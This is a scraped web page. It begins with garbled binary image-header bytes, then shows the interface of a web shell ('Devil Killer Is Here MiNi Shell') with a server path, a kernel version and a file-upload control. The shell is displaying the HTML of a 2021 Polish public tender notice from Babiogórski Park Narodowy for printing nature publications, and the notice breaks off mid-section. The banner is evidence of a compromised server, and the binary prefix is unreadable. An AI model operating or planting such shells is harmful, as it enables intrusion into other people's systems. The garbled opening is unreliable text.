JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210527/0006654201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00066542 z dnia 2021-05-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wydanie kompletu publikacji w ramach realizacji indywidualnego polsko-słowackiego mikroprojektu: „Z kamerą wśród zwierząt” (INT/EB/BES/1/VI/A/0225). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BABIOGÓRSKI PARK NARODOWY Z SIEDZIBĄ W ZAWOI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 122462192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1403</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawoja</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-222</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@bgpn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bgpn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona Przyrody </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wydanie kompletu publikacji w ramach realizacji indywidualnego polsko-słowackiego mikroprojektu: „Z kamerą wśród zwierząt” (INT/EB/BES/1/VI/A/0225). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8bf53a0-bed7-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00066542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010491/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wydanie kompletu publikacji w ramach realizacji indywidualnego polsko-słowackiego mikroprojektu: „Z kamerą wśród zwierząt” (INT/EB/BES/1/VI/A/0225).</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Polsko-słowacki mikroprojekt p.n. „Z kamerą wśród zwierząt” (numer projektu: INT/EB/BES/1/VI/A/0225) współfinansowany ze środków Unii Europejskiej w ramach Programu Współpracy Transgranicznej INTERREG V-A Rzeczpospolita Polska – Republika Słowacka 2014-2020 oraz z budżetu państwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.malopolska.pl/bgpn oraz http://www.bgpn.pl oraz https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/ , ePUAPu https://epuap.gov.pl/wps/portal oraz za pośrednictwem poczty elektronicznej: zamowienia@bgpn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">7.1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz za pośrednictwem poczty elektronicznej: zamowienia@bgpn.pl.<br/>7.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie <br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca <br/>posiadający konto na ePUAP ma dostęp do formularzy: „Formularz do <br/>złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do <br/>komunikacji”.<br/>7.3. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem <br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP -<br/>Warunki korzystania z elektronicznej platformy usług administracji publicznej.<br/>7.4. Wykonawca przystępując do niniejszego postępowania o udzielenie <br/>zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, <br/>określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z <br/>miniPortalu przestrzegać postanowień tego regulaminu.<br/>7.5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych <br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz do „Formularza do komunikacji” wynosi 150 MB.<br/>7.6. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>7.7. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za <br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP udostępnionego przez miniPortal (Formularz do komunikacji) oraz za pomocą <br/>poczty elektronicznej: zamowienia@bgpn.pl. Korespondencja przesłana za <br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej <br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i <br/>Wykonawcy posługują się numerem ogłoszenia (BZP) lub ZP-7/2021.<br/>7.8. Dane postępowanie można wyszukać na Liście wszystkich postępowań w <br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z <br/>zakładki Postępowania.<br/>11.1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w <br/>formacie danych: .pdf, .doc, .docx, .rtf,.xps, .odt i opatrzona kwalifikowanym <br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, za <br/>wyjątkiem części oferty - próbki. Próbka musi być złożona zgodnie z <br/>rozdziałem 8 SWZ.<br/>11.2. Wykonawca w celu poprawnego zaszyfrowania oferty powinien mieć <br/>zainstalowany na komputerze .NET Framework 4.5. Aplikacja działa na <br/>platformie Windows (Vista SP2, 7, 8, 10) Aplikacja nie jest dostępna dla systemu <br/>Linux i MAC OS.<br/>11.3. Sposób zaszyfrowania oferty opisany został w Instrukcji użytkownika dostępnej <br/>na miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: <span class="normal"></h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">8.1. Zamawiający odstępuje od wymagania użycia środków komunikacji <br/>elektronicznej zgodnie z art. 65 ust. 1 pkt. 4) – ponieważ wymaga złożenia <br/>próbki – stanowiącej część oferty, której nie można przekazać przy użyciu <br/>środków komunikacji elektronicznej.<br/>8.2. Część oferty – próbkę opisaną w rozdziale 16 SWZ wykonawca przekazuje:<br/>a) za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 <br/>listopada 2012 r. – Prawo pocztowe (Dz. U. z 2018 r. poz 2188 oraz z 2019 r. <br/>poz. 1051 i 1495),<br/>b) osobiście lub<br/>c) za pośrednictwem posłańca.<br/>8.3. Paczka/koperta, zaklejona(zamknięta) zawierająca Część oferty z próbką<br/>(Zamawiający zaleca dodania kartki z opisem, która część próbki dotyczy <br/>poszczególnie ocenianych publikacji (np. Książka o tematyce przyrodniczej w <br/>sztywnej oprawie szyto – próbka oznaczona numerem 1.) kierowana do <br/>Zamawiającego musi być oznaczona w następujący sposób: „ZP-7/2021 <br/>Oferta – próbka. Nie otwierać przed dniem 08.06.2021 r., godz. 9.15.” i <br/>musi być złożona na adres:<br/>Babiogórski Park Narodowy z siedzibą w Zawoi, 34-222 Zawoja 1403<br/>przed terminem składania ofert określonym w rozdziale 12 SWZ.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady <br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w <br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 96/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) zwanego dalej RODO), uprzejmie informujemy że: Minister właściwy do spraw rozwoju regionalnego (Minister Funduszy i Polityki Regionalnej z siedzibą przy ul. Wspólnej 2/4, 00-926 Warszawa), pełniący funkcję Instytucji Zarządzającej Programem Współpracy Transgranicznej Interreg V-A Polska – Słowacja 2014-2020 (Interreg PL-SK 2014-2020), jest administratorem danych osobowych przetwarzanych w związku z realizacją mikroprojektu p.n. „Z kamerą wśród zwierząt” nr INT/EB/BES/1/VI/A/0225. <br/>W sprawach dotyczących przetwarzania Państwa danych osobowych oraz <br/>korzystania z praw związanych z tym przetwarzaniem można się kontaktować z <br/>Inspektorem ochrony danych, e-mail: IOD@mfipr.gov.pl<br/>Dane te administrator powierzył Stowarzyszeniu „Region Beskidy” z siedzibą w <br/>Bielsku-Białej, ul. Widok 18/1-3, 43-300 Bielsko-Biała, zwanym dalej Euroregionem, do przetwarzania w ramach Projektu Parasolowego. Euroregion jest administratorem dla danych gromadzonych w systemie teleinformatycznym Generator Wniosków i Rozliczeń. Dane te będą przetwarzane w celu obsługi wniosków i rozliczeń składanych w ramach Interreg PL-SK 2014-2020 , na podstawie umowy o dofinansowanie nr 65/BES/PL-SK zawartej z Babiogórskim Park Narodowym z siedzibą w Zawoi (BgPN), Zawoja 1403, 34-222 Zawoja w celu realizacji i rozliczania mikroprojektu „Z kamerą wśród zwierząt” nr INT/EB/BES/1/VI/A/0225. Kontakt z Inspektorem Ochrony Danych Osobowych jest możliwy pod adresem: ul. Widok 18/1-3; 43-300 Bielsko-Biała lub pod adresem poczty elektronicznej: biuro@euroregion-beskidy.pl.<br/>BgPN jest podmiotem przetwarzającym dla danych osobowych przetwarzanych w związku z realizacją mikroprojektu „Z kamerą wśród zwierząt”. W sprawach <br/>związanych z przetwarzaniem danych osobowych mogą Państwo skontaktować się: iodo@bgpn.pl lub pisemnie na adres: Babiogórski Park Narodowy, 34-222 Zawoja 1403, z dopiskiem „Inspektor ODO”;<br/>Podstawą prawną przetwarzania danych jest:<br/>- konieczność wypełnienia obowiązków prawnych ciążących na administratorze, <br/>oraz podmiotach przetwarzających dane w imieniu i na rzecz administratora, na <br/>podstawie przepisów prawa unijnego i krajowego (art. 6 ust. 1 lit. c RODO):<br/>opisane szczegółowo od litery a do f w SWZ ZP-7/2021<br/>- przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy (art. 6 ust. 1 lit. b RODO). Będzie to miało miejsce w sytuacji, gdy przetwarzane są dane osobowe wykonawcy zamówienia publicznego; <br/>- podstawą prawną przetwarzania może być art. 6 ust. 1 lit. e RODO - przetwarzanie jest niezbędne o wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy publicznej powierzonej administratorowi (w tym podmiotowi przetwarzającemu), m. in. do organizowanych działań informacyjnopromocyjnych w ramach realizacji projektu lub dotyczących Interreg PL-SK 2014-<br/>2020, w tym przetwarzania wizerunku.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Odbiorcami danych osobowych będą:<br/>1. podmioty upoważnione do prowadzenia czynności (wizyty sprawdzające, <br/>kontrole i audyty w zakresie realizacji mikroprojektu i zachowania jego <br/>trwałości) zgodnie z obowiązującymi przepisami krajowymi i unijnymi, <br/>aktualnymi dokumentami programowymi oraz Podręcznikiem Mikrobeneficjenta. <br/>2. podmioty świadczące usługi, w tym związane z obsługą i rozwojem systemów <br/>teleinformatycznych oraz zapewnieniem łączności, w szczególności dostawcy <br/>rozwiązań IT i operatorzy telekomunikacyjni;<br/>3. osoby lub podmioty, którym udostępniona zostanie dokumentacja <br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp z dnia 11 września <br/>2019 r. – Prawo zamówień publicznych;<br/>Podanie danych związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego jest wymogiem ustawowym. Konsekwencje niepodania określonych <br/>danych wynikają z ustawy Prawo zamówień publicznych. Podanie pozostałych <br/>związanych z wdrażaniem EWT Interreg V-A Polska-Słowacja 2014-2020 jest <br/>dobrowolne, ale odmowa ich podania jest równoznaczna z brakiem możliwości <br/>podjęcia stosownych działań.<br/>Dane osobowe będą przechowywane przez okres 2 lat od zakończenia roku, w <br/>którym Minister właściwy do spraw rozwoju regionalnego przekaże organom Unii <br/>Europejskiej zbiorcze zestawienie wydatków zawierające wydatki ostatecznie <br/>rozliczające zakończony projekt (zgodnie z art. w art. 140 rozporządzenia <br/>Parlamentu Europejskiego i Rady (UE) nr 1303/2013 z dnia 17 grudnia 2013 r.). W niektórych przypadkach, np. prowadzenia kontroli u Ministra przez organy Unii <br/>Europejskiej, okres ten może zostać wydłużony. Po upływie ww. okresu dane <br/>osobowe będą podlegały archiwizacji zgodnie z przepisami ustawy z dnia 14 lipca <br/>1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>Osobie, której dane dotyczą, przysługuje:<br/>opisane szczegółowo w SWZ ZP-7/2021<br/>Dane osobowe nie będą objęte procesem zautomatyzowanego podejmowania <br/>decyzji, w tym profilowania.<br/>2. Informacja dla osób fizycznych, których dane osobowe zostaną przekazane <br/>Zamawiającemu przez Wykonawcę w związku z udziałem w postępowaniu lub <br/>zawarciem i realizacją umowy o zamówienie publiczne (w szczególności <br/>pracownikom Wykonawcy lub podwykonawcom), wynikająca z art.14 RODO:<br/>Poza informacjami zawartymi w pkt. 36.1 Informacja o przetwarzaniu danych <br/>osobowych informujemy, że:<br/>- źródłem pochodzenia danych jest Wykonawca;<br/>- od Wykonawcy pozyskano imię i nazwisko osób, skierowanych przez <br/>Wykonawcę do realizacji zamówienia publicznego, w szczególności <br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich <br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia <br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami. <br/>3. Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym <br/>wynikającym z art. 14 RODO względem osób fizycznych, których dane <br/>przekazane zostaną Zamawiającemu, chyba że ma zastosowanie co najmniej <br/>jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-7/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 66388,17 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia jest wydanie kompletu publikacji w ramach realizacji indywidualnego polsko-słowackiego mikroprojektu p.n. „Z kamerą wśród zwierząt” (numer projektu: INT/EB/BES/1/VI/A/0225) współfinansowanego ze środków Unii Europejskiej w ramach Programu Współpracy Transgranicznej INTERREG V-A Rzeczpospolita Polska – Republika Słowacka 2014-2020 oraz z <br/>budżetu państwa.<br/>4.3. Przedmiotem zamówienia jest:<br/>a) Projekt graficzny,<br/>b) Redakcja, konsultacja i dwujęzyczna korekta tekstów,<br/>c) Nadanie numeru ISBN,<br/>d) Skład i wydanie drukiem,<br/>e) Oprawa, konfekcjonowanie i dostawa do siedziby Babiogórskiego Parku <br/>Narodowego w Zawoi (pow. suski, woj. małopolskie)<br/>4.4. Komplet publikacji, o którym mowa w pkt. 4.1. tworzą następujące publikacje:<br/>a) Publikacja popularna (książka),<br/>b) Teczka edukacyjna.<br/>4.5. Szczegółowy opis przedmiotu zamówienia – dane techniczne i opisy <br/>poszczególnych publikacji, a także dodatkowe informacje związane z realizacją <br/>przedmiotu zamówienia opisane zostały w załączniku nr 1 do SWZ.<br/>4.6. Zgodnie z art. 60 Ustawy PZP Zamawiający zastrzega obowiązek osobistego <br/>wykonania przez Wykonawcę kluczowych zadań dotyczących usługi: projektu <br/>graficznego, składu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79552000-8 - Usługi przetwarzania tekstu</p> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">79822300-5 - Usługi składania</p> <p class="mb-0">79822500-7 - Usługi projektów graficznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16.1. Przy wyborze oferty Zamawiający będzie się kierował następującymi <br/>kryteriami: <br/>a) Cena – 60%<br/>W ramach kryterium „Cena” ocenie podlegać będzie cena łączna brutto <br/>podana w formularzu oferty (załącznik nr 2 do SWZ). Jeżeli złożono ofertę, <br/>której wybór prowadziłby do powstania u Zamawiającego obowiązku <br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, <br/>Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej <br/>ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie <br/>z tymi przepisami (art. 225 ust. 1 PZP). Ocena ofert zostanie dokonana przy <br/>zastosowaniu wzoru:<br/>C = Cn/Co x 100 punktów x 60%<br/>gdzie: <br/>C – liczba punktów w ramach kryterium „Cena”, <br/>Cn - najniższa cena spośród ofert ocenianych <br/>Co - cena oferty ocenianej<br/>b) Jakość wykonania i walory estetyczne – 40%<br/>Wykonawca winien złożyć wraz z ofertą próbkę, która jest przedmiotowym <br/>środkiem dowodowym w rozumieniu art. 107 ust. 3 PZP, która będzie <br/>podlegała ocenie (przesłaną zgodnie z rozdziałem 8 SWZ), w której skład <br/>wchodzą:<br/>a) Barwna teczka składana z materiałami edukacyjnymi w postaci:<br/>Instrukcji, ilustrowane kolorowymi fotografiami i rycinami materiałów dla <br/>odbiorców, barwnych plansz, kart pracy, karty do gry itp.- wymagane <br/>minimum 3 składowe z wymienionych.<br/>b) Książka o tematyce przyrodniczej w sztywnej oprawie szyto-klejonej<br/>– nie mniej niż 100 stronicowa, z barwną okładką, kapitałką, <br/>przynajmniej z 20-stoma kolorowymi fotografiami przedstawiającymi <br/>przyrodę.<br/>c) Projekty graficzne – próbka, wydrukowana w odpowiednim, <br/>wynikającym z dokumentacji z postępowania (załącznik nr 1, 8 i 9 do <br/>SWZ) formacie, wykonana według załączonych wytycznych i z <br/>wykorzystaniem załączonych materiałów, złożona z:<br/>Szczegółowy opis projektów graficznych opisany w ZP-7/2021.<br/>Karta oceny ofert w SWZ ZP-7/2021.<br/>Próbki oceniane będą przez członków Komisji Przetargowej i/lub biegłych <br/>powołanych do oceny w/w kryterium. Celem niniejszego kryterium jest <br/>potwierdzenie jakości i walorów estetycznych, a także potwierdzenie, że Wykonawca spełni wymogi Opisu przedmiotu zamówienia i niniejszej SWZ. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu. Komisja przetargowa może przyznać następujące wartości punktów: 0 pkt, 0,5 pkt, 1 pkt lub 2 pkt w zależności ocenianej kategorii.<br/>16.2. Za 